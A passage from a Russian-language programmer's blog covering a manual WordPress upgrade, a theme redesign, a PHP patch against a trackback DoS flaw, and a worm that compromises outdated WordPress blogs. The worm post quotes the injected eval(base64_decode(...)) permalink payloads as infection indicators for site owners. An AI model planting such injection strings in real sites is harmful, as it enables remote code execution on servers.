Заметки одного программиста

Блог, который вы читаете сейчас, изначально был развёрнут на сборке WordPress от mywordpress.ru . Почему именно на этой сборке? Причин тут несколько. Во-первых, эта сборка отличается облегчённым файлом локализации. Использование облегчённой версии ru_RU.mo уменьшает потребление ресурсов во время просмотра страниц блога. Во-вторых, эта сборка содержит пару полезных плагинов: MaxSite Russian Date для отображения дат по российским стандартам, RusToLat для транслитерации русских символов в английские (используется, например, при создании ЧПУ), WP Super Cache для кэширования (я его не использовал), “Блокировка запросов на новые версии” для ускорения работы блога (его я тоже не использовал). Особенностью сборки было то, что она обновлялась со своего сайта, а не с сайта WordPress. Новые версии выходили с небольшим опозданием от основного WordPress. Свежая версия WP – 3.0 – вышла уже давненько, но еще не появлялась обновленная сборка от mywordpress.ru, и я решил обновить движок блога руками. Читать далее…

Захотелось чего-то нового, и решил я сменить тему блога. Подыскал в интернете тему покрасивее, подыскал красивую картинку в фон, чтобы радовала глаз, и приступил к издевательствам над темой . Кстати на фотографии запечатлен западный берег Окленда, что в Новой Зеландии. Где взял – не скажу)) – найдете сами, если захотите. Колупался я с темой долго – она не была переведена, к тому же пришлось ручками вставлять некоторые плагины и по ходу дела узнавать интересности CSS3, которая использована в этом шаблоне. Так что скругленные углы различных блоков этой темы в Опере вы пока не увидите (поддержка скругленных углов обещается разработчиками в Presto 2.3, текущая версия движка Opera – 2.2.1 для Opera 10.0). С руссификацией админки я особо не заморачивался – инглиш мне понятен, главное чтобы посетитель сайта не был обескуражен кашей из разных языков. Времени у меня это заняло несколько часов (примерно 6-8), плюс пару часов я проколупался с навигацией (номера страниц внизу сайта). Очень долго. Впрочем, это мой первый опыт модификации шаблона, с версткой я доселе был знаком только понаслышке, поэтому вполне законно могу себя в этом оправдать – все-таки я программист, а не верстальщик . Сменой темы очень рад и очень жду ваших комментариев по поводу нового оформления и ваших голосов – специально для этого добавил голосование. Ваша конструктивная критика только приветствуется

Прошло около полутора месяцев с выхода последнего обновления WordPress, исправляющего в нем уязвимость. И вот, позавчера стало известно о новой дырке в этом популярном движке. В этот раз уязвимость найдена в файле wp-trackback.php. Уязвимость позволяет провести DoS-атаку на уязвимый блог. Новая версия (2.8.5) движка, убирающая уязвимость, уже вышла, скачать ее можно тут. Уязвимость можно пофиксить вручную. Для этого надо добавить следующие строки в файл wp-trackback.php:

function ft_stop_trackback_dos_attacks(){
       global $pagenow;
       if ( 'wp-trackback.php' == $pagenow ){
               // DoS attack fix.
               if ( isset($_POST['charset']) ){
                       $charset = $_POST['charset'];
                       if ( strlen($charset) > 50 ) {  die; }
               }
       }
}
add_action('init','ft_stop_trackback_dos_attacks');

Свежая русская версия, надо полагать, на подходе. Так что, сторонникам официальных апдейтов придется немного подождать

Многие блоггеры, следящие за уровнем безопасности своих wordpress-блогов, знают, что около месяца назад была найдена уязвимость в движке WordPress, позволяющая сбросить пароль администратора блога несложным HTTP-запросом. Уязвимость актуальна для движка версии до 2.8.3 включительно. Однако немногие обновляют свои блоги своевременно. Именно на блоги таких пользователей и направлен новый WordPress-вирус. Вирус работает примерно так (мой вольный перевод)) ): регистрирует новую учетную запись пользователя, использует уязвимость для выполнения кода через структуру ЧПУ (человеко-понятные УРЛы, они же “постоянные ссылки”, они же permalinks), найденную ранее, повышает свои права до администраторских. Затем использует JavaScript для того, чтобы спрятать себя из списка пользователей. В процессе выполнения вирус спамит ваши старые посты. Далее вирус пытается почистить за собой по окончании работы.

Присутствие вируса сложно обнаружить, тем более если он ещё ничего не опубликовал. Для обнаружения нужно проверить фид permalinks/rss на присутствие кода:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))
%7D%7D|.+)&%

или ошибки

‘error on line 22 at column 71: xmlParseEntityRef: no
name wordpress’

Если такой код присутствует или фид “сломан”, то блог инфицирован. Здесь можно почитать, как избавиться от заразы, а здесь – как обновиться. Ну а вот тут – как обезопасить свой блог от “набегов” подобной гадости))